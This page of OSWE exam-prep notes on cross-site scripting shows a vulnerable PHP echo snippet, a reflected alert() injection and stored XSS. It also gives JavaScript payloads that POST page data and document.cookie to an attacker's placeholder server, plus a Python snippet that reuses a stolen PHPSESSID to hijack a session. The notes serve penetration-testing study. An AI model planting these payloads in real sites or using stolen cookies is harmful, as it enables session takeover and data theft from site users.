AWAE - OSWE Preparation / Resources
  • TL;DR
  • General
    • Resources
      • BurpSuite
      • WhiteBox
    • POCs
      • Deserialization
        • PHP
        • Java
          • Ysoserial
      • SQL Injection
      • Type Juggling
      • CSRF
  • By Vulnerability
    • SQL Injection
      • Summary
      • Types
      • Injection by clause
      • Bypassing Character Restrictions
      • By Language
        • JAVA
          • Regex
          • Summary
      • Regex
      • Resources
    • Deserialization
      • By Language
        • PHP
          • Regex
          • Summary
          • Practice
        • JAVA
          • Regex
          • Summary
          • Practice
          • Resources
        • .NET
          • Regex
          • Summary
          • Resources
      • Resources
    • XSS
    • XXE
      • By Language
        • PHP
          • Practice
          • Resources
        • Java
          • Vulnerable Libraries' Implementation
      • Resources
    • SSTI
      • Summary
      • Practice
      • Resources
    • File Upload Restrictions Bypass
      • Tricks
      • File Extension Filters Bypass List
      • Resources
  • REGEX
  • By Language
    • PHP
      • Regex
      • Type Juggling
        • Summary
        • Practice
    • Java
      • Decompiling
      • Compiling & Running
    • NodeJS
      • Practice
  • Random
  • Other Repositories
Powered by GitBook
On this page
  • Reflected
  • Vulnerable code
  • Stored
  • Data exfiltration
  • Exfiltrating basic data
  • Exfiltrating other endpoint's data
  • Session Hijaking
  • Exfiltrating the cookie
  • Using the cookie
  • Filter Bypass

Was this helpful?

  1. By Vulnerability

XSS

Cross-Site Scripting (XSS)

Reflected

Vulnerable code

<?php
        echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
?>

The injection

http(s)://HOST/file.php?search=1

Response

<div><p>Searched string: 1</p></div>

http(s)://HOST/file.php?search=</p><script>alert()</script><p>

Response

<div><p>Searched string: </p><script>alert()</script><p></p></div>

As you can see, the injected code gets inserted into the HTML response of the website.

</p> -> Closing current tag. <script> -> Opening javascript tag. alert() -> Function to pop an alert box. </script> -> Closing javascript tag. <p> -> Reopening p tag for the response not to mess up.

Stored

In this injection, the code gets stored into a database (e.g. as a comment, name, description, etc) and then gets reflected when it is displayed.

Data exfiltration

To exfiltrate data, a receiving server would be needed, like a HTPP server.

Exfiltrating basic data

<html>
<script>

first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send("EXFILTRATED-DATA");

</script>
</html>

Exfiltrating other endpoint's data

<html>
<script>

first = new XMLHttpRequest();
first.open("GET", "TARGET-SERVER");
first.onreadystatechange = function () {
        if (first.readyState === XMLHttpRequest.DONE) {
                second = new XMLHttpRequest();
                second.open("POST", "YOUR-SERVER");
                second.send("EXFILTRATED-DATA");
        }
}
first.send();

</script>
</html>

Session Hijaking

In a nuthshell, stealing the (administrator|authenticated user) sesion cookie's value and using it.

Exfiltrating the cookie

<html>
<script>

first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send(document.cookie);

</script>
</html>

Using the cookie

import requests

url = ""
exfiltrated_cookie = ""
cookies = {'PHPSESSID': f"{exfiltrated_cookie}"} # Example

r = requests.get(url, cookies=cookies)

Filter Bypass

PreviousResourcesNextXXE

Last updated 4 years ago

Was this helpful?

NGROK's substitute for tunXs and python's SimpleHTTPSever/http.server
https://owasp.org/www-community/xss-filter-evasion-cheatsheetowasp.org
247ctf [Web]: TrustedClientITasahobby
Logo